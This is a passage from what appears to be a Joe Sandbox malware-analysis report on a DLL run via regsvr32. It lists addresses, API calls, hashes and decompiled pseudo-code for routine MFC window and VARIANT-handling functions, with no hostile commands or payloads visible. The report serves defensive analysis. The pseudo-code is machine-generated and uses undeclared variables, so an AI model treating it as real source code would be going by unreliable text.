                                                                                                            0x1001a0ca
                                                                                                            0x1001a0cf
                                                                                                            0x00000000
                                                                                                            0x1001a070
                                                                                                            0x1001a070
                                                                                                            0x1001a071
                                                                                                            0x1001a083
                                                                                                            0x1001a086
                                                                                                            0x1001a093
                                                                                                            0x1001a097
                                                                                                            0x1001a09c
                                                                                                            0x1001a213
                                                                                                            0x1001a214
                                                                                                            0x1001a217
                                                                                                            0x1001a217
                                                                                                            0x1001a071
                                                                                                            0x1001a06e
                                                                                                            0x1001a06b
                                                                                                            0x1001a064
                                                                                                            0x1001a05d
                                                                                                            0x1001a056
                                                                                                            0x1001a04e
                                                                                                            0x1001a048
                                                                                                            0x1001a03f
                                                                                                            0x1001a471
                                                                                                            0x1001a47a
                                                                                                            0x1001a47a
                                                                                                            0x10019ff8
                                                                                                            0x10019ff8
                                                                                                            0x10019fff
                                                                                                            0x1001a008
                                                                                                            0x1001a008
                                                                                                            0x1001a482
                                                                                                            0x1001a48a
                                                                                                            0x1001a48b
                                                                                                            0x1001a48c
                                                                                                            0x1001a49b

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 10019FA3
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1001A008
                                                                                                              • Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
                                                                                                              • Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1001A217
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1001A289
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1001A47A
                                                                                                              • Part of subcall function 1001BDD4: VariantCopy.OLEAUT32(?,?), ref: 1001BDE2
                                                                                                              • Part of subcall function 1000563B: __EH_prolog3.LIBCMT ref: 10005642
                                                                                                              • Part of subcall function 1001C08A: __EH_prolog3.LIBCMT ref: 1001C094
                                                                                                              • Part of subcall function 1001C08A: lstrlenA.KERNEL32(?,00000224,1001A446,?,00000008,00000000,?,000000CC), ref: 1001C0B3
                                                                                                              • Part of subcall function 1001C08A: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 1001C0BB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearH_prolog3$AllocByteCopyException@8StringThrowlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1021156189-0
                                                                                                            • Opcode ID: 11928700629b18b402dda85779f21ecb76941389bd754c7d3cf7010b2ddea385
                                                                                                            • Instruction ID: 4e7b89f9de4aa6b433371361e179044e480e3473b7358c3f62ac7a10d9bffcd1
                                                                                                            • Opcode Fuzzy Hash: 11928700629b18b402dda85779f21ecb76941389bd754c7d3cf7010b2ddea385
                                                                                                            • Instruction Fuzzy Hash: B3F1587480014CEADF55DFA4C880AED7BB9FF09344F50805AF8559B292EB74EAC8DB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001D5EB Relevance: 9.1, APIs: 6, Instructions: 118memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 42%
                                                                                                            			E1001D5EB(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t42;
				void* _t46;
				void* _t47;
				void* _t52;
				intOrPtr _t66;
				intOrPtr _t74;
				void* _t76;
				void* _t96;
				void* _t97;
				intOrPtr* _t98;
				void* _t99;
				short* _t101;
				void* _t102;
				signed int _t103;
				void* _t105;

				_t96 = __edx;
				_t103 = _t105 - 0x8c;
				_t42 =  *0x10045580; // 0x8f64cb61
				 *(_t103 + 0x88) = _t42 ^ _t103;
				_t74 =  *((intOrPtr*)(_t103 + 0x98));
				_t101 =  *((intOrPtr*)(_t103 + 0x94));
				_push(_t97);
				E10020F40(_t97, _t101, 0, 0x20);
				 *((intOrPtr*)(_t103 - 0x80)) = _t103 - 0x78;
				_t46 = E1001056A(_t74, 0x10038ea0);
				_t98 = __imp__#2;
				if(_t46 == 0) {
					_t78 = _t74;
					_t47 = E1001056A(_t74, 0x10036ce4);
					__eflags = _t47;
					_push(0x100);
					_push(_t103 - 0x78);
					if(_t47 == 0) {
						_push(0xf108);
						E100103ED(_t74, _t78, _t98, _t101, _t103);
						 *_t101 = 0xf108;
					} else {
						_push(0xf10a);
						E100103ED(_t74, _t78, _t98, _t101, _t103);
						 *_t101 = 0xf10a;
					}
				} else {
					 *((intOrPtr*)(_t103 - 0x80)) =  *((intOrPtr*)(_t74 + 0xc));
					 *_t101 =  *((intOrPtr*)(_t74 + 8));
					 *((intOrPtr*)(_t101 + 0x10)) =  *((intOrPtr*)(_t74 + 0x10));
					 *((intOrPtr*)(_t101 + 0x1c)) =  *((intOrPtr*)(_t74 + 0x1c));
					_t66 =  *((intOrPtr*)(_t74 + 0x14));
					_t111 =  *((intOrPtr*)(_t66 - 0xc));
					if( *((intOrPtr*)(_t66 - 0xc)) != 0) {
						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E1000567F(_t74, _t103 - 0x7c, _t98, _t101, _t111))), _t66);
						E10001260( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
					_t74 =  *((intOrPtr*)(_t74 + 0x18));
					_t113 =  *((intOrPtr*)(_t74 - 0xc));
					if( *((intOrPtr*)(_t74 - 0xc)) != 0) {
						 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E1000567F(_t74, _t103 - 0x7c, _t98, _t101, _t113))), _t74);
						E10001260( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
				}
				 *((intOrPtr*)(_t101 + 8)) =  *_t98( *((intOrPtr*)(E1000567F(_t74, _t103 - 0x7c, _t98, _t101, _t113))),  *((intOrPtr*)(_t103 - 0x80)));
				_t52 = E10001260( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
				_t114 =  *((intOrPtr*)(_t101 + 4));
				if( *((intOrPtr*)(_t101 + 4)) == 0) {
					 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E1000567F(0, _t103 - 0x7c, _t98, _t101, _t114))),  *((intOrPtr*)(E1000EC09(0, _t98, _t101, _t114) + 0x10)));
					_t52 = E10001260( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
				}
				if( *((intOrPtr*)(_t101 + 0xc)) == 0) {
					_t117 =  *((intOrPtr*)(_t101 + 0x10));
					if( *((intOrPtr*)(_t101 + 0x10)) != 0) {
						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E1000567F(0, _t103 - 0x7c, _t98, _t101, _t117))),  *((intOrPtr*)( *((intOrPtr*)(E1000EC09(0, _t98, _t101, _t117) + 4)) + 0x64)));
						_t52 = E10001260( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
				}
				_pop(_t99);
				_pop(_t102);
				_pop(_t76);
				return E1001FBB5(_t52, _t76,  *(_t103 + 0x88) ^ _t103, _t96, _t99, _t102);
			}






















                                                                                                            0x1001d5eb
                                                                                                            0x1001d5ec
                                                                                                            0x1001d5f9
                                                                                                            0x1001d600
                                                                                                            0x1001d607
                                                                                                            0x1001d60e
                                                                                                            0x1001d614
                                                                                                            0x1001d61a
                                                                                                            0x1001d62c
                                                                                                            0x1001d62f
                                                                                                            0x1001d636
                                                                                                            0x1001d63c
                                                                                                            0x1001d6a6
                                                                                                            0x1001d6a8
                                                                                                            0x1001d6ad
                                                                                                            0x1001d6af
                                                                                                            0x1001d6b7
                                                                                                            0x1001d6b8
                                                                                                            0x1001d6cb
                                                                                                            0x1001d6d0
                                                                                                            0x1001d6d5
                                                                                                            0x1001d6ba
                                                                                                            0x1001d6ba
                                                                                                            0x1001d6bf
                                                                                                            0x1001d6c4
                                                                                                            0x1001d6c4
                                                                                                            0x1001d63e
                                                                                                            0x1001d641
                                                                                                            0x1001d648
                                                                                                            0x1001d64e
                                                                                                            0x1001d654
                                                                                                            0x1001d657
                                                                                                            0x1001d65a
                                                                                                            0x1001d65e
                                                                                                            0x1001d673
                                                                                                            0x1001d676
                                                                                                            0x1001d676
                                                                                                            0x1001d67b
                                                                                                            0x1001d67e
                                                                                                            0x1001d682
                                                                                                            0x1001d697
                                                                                                            0x1001d69a
                                                                                                            0x1001d69a
                                                                                                            0x1001d682
                                                                                                            0x1001d6ef
                                                                                                            0x1001d6f2
                                                                                                            0x1001d6f9
                                                                                                            0x1001d6fc
                                                                                                            0x1001d718
                                                                                                            0x1001d71b
                                                                                                            0x1001d71b
                                                                                                            0x1001d723
                                                                                                            0x1001d725
                                                                                                            0x1001d728
                                                                                                            0x1001d747
                                                                                                            0x1001d74a
                                                                                                            0x1001d74a
                                                                                                            0x1001d728
                                                                                                            0x1001d755
                                                                                                            0x1001d756
                                                                                                            0x1001d759
                                                                                                            0x1001d766

                                                                                                            APIs
                                                                                                            • _memset.LIBCMT ref: 1001D61A
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1001D66B
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1001D68F
                                                                                                              • Part of subcall function 1000567F: __EH_prolog3.LIBCMT ref: 10005686
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1001D6E7
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1001D710
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1001D73F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocString$H_prolog3_memset
                                                                                                            • String ID:
                                                                                                            • API String ID: 842698744-0
                                                                                                            • Opcode ID: df61c5337132f301d7380ed1605a359c448a967be7e87a7bfd6a5cb2acb23dbb
                                                                                                            • Instruction ID: 6e1135c887c9357414f922cece5f9f8fee59e25652f77c4319450727ae6b76bc
                                                                                                            • Opcode Fuzzy Hash: df61c5337132f301d7380ed1605a359c448a967be7e87a7bfd6a5cb2acb23dbb
                                                                                                            • Instruction Fuzzy Hash: 00415E34900208CFDB24EFB8D881A9EB7B1FF54354F10852EF5A69B2A6DB71A854CF54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000772D Relevance: 9.1, APIs: 6, Instructions: 115threadwindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 81%
                                                                                                            			E1000772D(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t37;
				signed int _t54;
				intOrPtr _t57;
				long _t60;
				struct HWND__* _t63;
				CHAR* _t64;
				void* _t65;
				void* _t67;
				void* _t71;
				void* _t72;
				long _t73;
				void* _t74;
				void* _t75;
				signed int _t77;
				void* _t78;
				signed int _t79;
				void* _t81;

				_t71 = __edx;
				_t79 = _t81 - 0x9c;
				_t37 =  *0x10045580; // 0x8f64cb61
				 *(_t79 + 0x98) = _t37 ^ _t79;
				_t73 =  *(_t79 + 0xa4);
				_t77 = 0;
				 *((intOrPtr*)(_t79 - 0x80)) =  *((intOrPtr*)(_t79 + 0xa8));
				E1000764E(0);
				_t67 = _t72;
				_t63 = E10007682(0, _t79 - 0x70);
				 *(_t79 - 0x7c) = _t63;
				if(_t63 !=  *(_t79 - 0x70)) {
					EnableWindow(_t63, 1);
				}
				 *(_t79 - 0x78) =  *(_t79 - 0x78) & _t77;
				GetWindowThreadProcessId(_t63, _t79 - 0x78);
				if(_t63 == 0 ||  *(_t79 - 0x78) != GetCurrentProcessId()) {
					L6:
					__eflags = _t73;
					if(__eflags != 0) {
						_t77 = _t73 + 0x78;
					}
					goto L8;
				} else {
					_t60 = SendMessageA(_t63, 0x376, 0, 0);
					if(_t60 == 0) {
						goto L6;
					} else {
						_t77 = _t60;
						L8:
						 *(_t79 - 0x74) =  *(_t79 - 0x74) & 0x00000000;
						if(_t77 != 0) {
							 *(_t79 - 0x74) =  *_t77;
							_t57 =  *((intOrPtr*)(_t79 + 0xb0));
							if(_t57 != 0) {
								 *_t77 = _t57 + 0x30000;
							}
						}
						if(( *(_t79 + 0xac) & 0x000000f0) == 0) {
							_t54 =  *(_t79 + 0xac) & 0x0000000f;
							if(_t54 <= 1) {
								_t24 = _t79 + 0xac;
								 *_t24 =  *(_t79 + 0xac) | 0x00000030;
								__eflags =  *_t24;
							} else {
								if(_t54 + 0xfffffffd <= 1) {
									 *(_t79 + 0xac) =  *(_t79 + 0xac) | 0x00000020;
								}
							}
						}
						_t96 = _t73;
						 *(_t79 - 0x6c) = 0;
						if(_t73 == 0) {
							_t64 = _t79 - 0x6c;
							_t73 = 0x104;
							__eflags = GetModuleFileNameA(0, _t64, 0x104) - 0x104;
							if(__eflags == 0) {
								 *((char*)(_t79 + 0x97)) = 0;
							}
						} else {
							_t64 =  *(_t73 + 0x50);
						}
						_push( *(_t79 + 0xac));
						_push(_t64);
						_push( *((intOrPtr*)(_t79 - 0x80)));
						_push( *(_t79 - 0x7c));
						_t74 = E100075B7(_t64, _t67, _t73, _t77, _t96);
						if(_t77 != 0) {
							 *_t77 =  *(_t79 - 0x74);
						}
						if( *(_t79 - 0x70) != 0) {
							EnableWindow( *(_t79 - 0x70), 1);
						}
						E1000764E(1);
						_pop(_t75);
						_pop(_t78);
						_pop(_t65);
						return E1001FBB5(_t74, _t65,  *(_t79 + 0x98) ^ _t79, _t71, _t75, _t78);
					}
				}
			}
























                                                                                                            0x1000772d
                                                                                                            0x1000772e
                                                                                                            0x1000773b
                                                                                                            0x10007742
                                                                                                            0x10007751
                                                                                                            0x10007757
                                                                                                            0x1000775a
                                                                                                            0x1000775d
                                                                                                            0x10007762
                                                                                                            0x1000776d
                                                                                                            0x10007772
                                                                                                            0x10007775
                                                                                                            0x1000777a
                                                                                                            0x1000777a
                                                                                                            0x10007780
                                                                                                            0x10007788
                                                                                                            0x10007790
                                                                                                            0x100077b5
                                                                                                            0x100077b5
                                                                                                            0x100077b7
                                                                                                            0x100077b9
                                                                                                            0x100077b9
                                                                                                            0x00000000
                                                                                                            0x1000779d
                                                                                                            0x100077a7
                                                                                                            0x100077af
                                                                                                            0x00000000
                                                                                                            0x100077b1
                                                                                                            0x100077b1
                                                                                                            0x100077bc
                                                                                                            0x100077bc
                                                                                                            0x100077c2
                                                                                                            0x100077c6
                                                                                                            0x100077c9
                                                                                                            0x100077d1
                                                                                                            0x100077d8
                                                                                                            0x100077d8
                                                                                                            0x100077d1
                                                                                                            0x100077e1
                                                                                                            0x100077e9
                                                                                                            0x100077ef
                                                                                                            0x10007802
                                                                                                            0x10007802
                                                                                                            0x10007802
                                                                                                            0x100077f1
                                                                                                            0x100077f7
                                                                                                            0x100077f9
                                                                                                            0x100077f9
                                                                                                            0x100077f7
                                                                                                            0x100077ef
                                                                                                            0x10007809
                                                                                                            0x1000780b
                                                                                                            0x1000780f
                                                                                                            0x10007816
                                                                                                            0x10007819
                                                                                                            0x1000782a
                                                                                                            0x1000782c
                                                                                                            0x1000782e
                                                                                                            0x1000782e
                                                                                                            0x10007811
                                                                                                            0x10007811
                                                                                                            0x10007811
                                                                                                            0x10007835
                                                                                                            0x1000783b
                                                                                                            0x1000783c
                                                                                                            0x1000783f
                                                                                                            0x1000784c
                                                                                                            0x1000784e
                                                                                                            0x10007853
                                                                                                            0x10007853
                                                                                                            0x10007859
                                                                                                            0x10007860
                                                                                                            0x10007860
                                                                                                            0x10007868
                                                                                                            0x10007876
                                                                                                            0x10007877
                                                                                                            0x1000787a
                                                                                                            0x10007887
                                                                                                            0x10007887
                                                                                                            0x100077af

                                                                                                            APIs
                                                                                                              • Part of subcall function 10007682: GetParent.USER32(?), ref: 100076D5
                                                                                                              • Part of subcall function 10007682: GetLastActivePopup.USER32(?), ref: 100076E4
                                                                                                              • Part of subcall function 10007682: IsWindowEnabled.USER32(?), ref: 100076F9
                                                                                                              • Part of subcall function 10007682: EnableWindow.USER32(?,00000000), ref: 1000770C
                                                                                                            • EnableWindow.USER32(?,00000001), ref: 1000777A
                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 10007788
                                                                                                            • GetCurrentProcessId.KERNEL32(?,?), ref: 10007792
                                                                                                            • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 100077A7
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 10007824
                                                                                                            • EnableWindow.USER32(?,00000001), ref: 10007860
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 1877664794-0
                                                                                                            • Opcode ID: f2399ea1d54a9bf52ed2f5ca6e2961852035bc04a76c1f8deff7aeca07201bb6
                                                                                                            • Instruction ID: bdb92c1df6b4a8dc20cb8eb5586ece2812bcce3fef41ea9017e6a72a13aca31b
                                                                                                            • Opcode Fuzzy Hash: f2399ea1d54a9bf52ed2f5ca6e2961852035bc04a76c1f8deff7aeca07201bb6
                                                                                                            • Instruction Fuzzy Hash: DB417B32E002589FFB31CF74CC89B9D77A8FF05280F214119E95D9B286EB799944CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10007682 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10007682(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E100075AB();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x20);
					goto L7;
				}
				_t13 = E10005CAE();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}









                                                                                                            0x1000768a
                                                                                                            0x10007692
                                                                                                            0x10007694
                                                                                                            0x100076b1
                                                                                                            0x100076bf
                                                                                                            0x100076ca
                                                                                                            0x100076cc
                                                                                                            0x100076ce
                                                                                                            0x100076d0
                                                                                                            0x100076db
                                                                                                            0x100076dd
                                                                                                            0x100076ea
                                                                                                            0x100076ea
                                                                                                            0x100076ec
                                                                                                            0x100076f2
                                                                                                            0x100076f6
                                                                                                            0x10007714
                                                                                                            0x10007707
                                                                                                            0x1000770a
                                                                                                            0x1000770c
                                                                                                            0x1000770c
                                                                                                            0x100076f6
                                                                                                            0x1000771d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100076d2
                                                                                                            0x100076d2
                                                                                                            0x100076d3
                                                                                                            0x100076d5
                                                                                                            0x100076d7
                                                                                                            0x00000000
                                                                                                            0x100076d2
                                                                                                            0x100076c4
                                                                                                            0x100076c6
                                                                                                            0x100076c8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100076c8
                                                                                                            0x10007696
                                                                                                            0x1000769d
                                                                                                            0x100076ac
                                                                                                            0x100076ac
                                                                                                            0x00000000
                                                                                                            0x100076ac
                                                                                                            0x1000769f
                                                                                                            0x100076a6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100076a8
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                            • String ID:
                                                                                                            • API String ID: 670545878-0
                                                                                                            • Opcode ID: 0495e4ef43923a245b0fe769c269373e2e029a288f2a749e2dd0ce88f3e134b5
                                                                                                            • Instruction ID: 462ae3bbbf91228899846c1fb6a9f27f843f520308df6a83637efefa3aec2235
                                                                                                            • Opcode Fuzzy Hash: 0495e4ef43923a245b0fe769c269373e2e029a288f2a749e2dd0ce88f3e134b5
                                                                                                            • Instruction Fuzzy Hash: 3411CE72E04A365BF2229A6D8C80B1B77DCFF49AE0F124115EC0EE7219DB6ACC0046F5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10011181 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 90%
                                                                                                            			E10011181(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_t12 = GetWindow(_a4, 5);
				while(1) {
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_t12 = GetWindow(_t21, 2);
				}
				return _t12;
			}






                                                                                                            0x10011190
                                                                                                            0x100111e1
                                                                                                            0x100111e1
                                                                                                            0x100111e3
                                                                                                            0x100111e7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100111ad
                                                                                                            0x100111c4
                                                                                                            0x100111ca
                                                                                                            0x100111dc
                                                                                                            0x00000000
                                                                                                            0x100111ef
                                                                                                            0x100111dc
                                                                                                            0x100111e1
                                                                                                            0x100111e1
                                                                                                            0x100111ec

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1315500227-0
                                                                                                            • Opcode ID: 0bb2bf6e42f8f06f434990d85aaec66e0fa50538ae204af0560bac11247d4450
                                                                                                            • Instruction ID: 0af4e894630c16eeb035fae8976970eddf4787ec4e71c720814606927fab57bb
                                                                                                            • Opcode Fuzzy Hash: 0bb2bf6e42f8f06f434990d85aaec66e0fa50538ae204af0560bac11247d4450
                                                                                                            • Instruction Fuzzy Hash: 05014B36A0112ABBEB129F958C48EDE7BACEF49791F008014FE11AE061D730DB458BA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000D1F4 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E1000D1F4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v28;
				intOrPtr _v32;
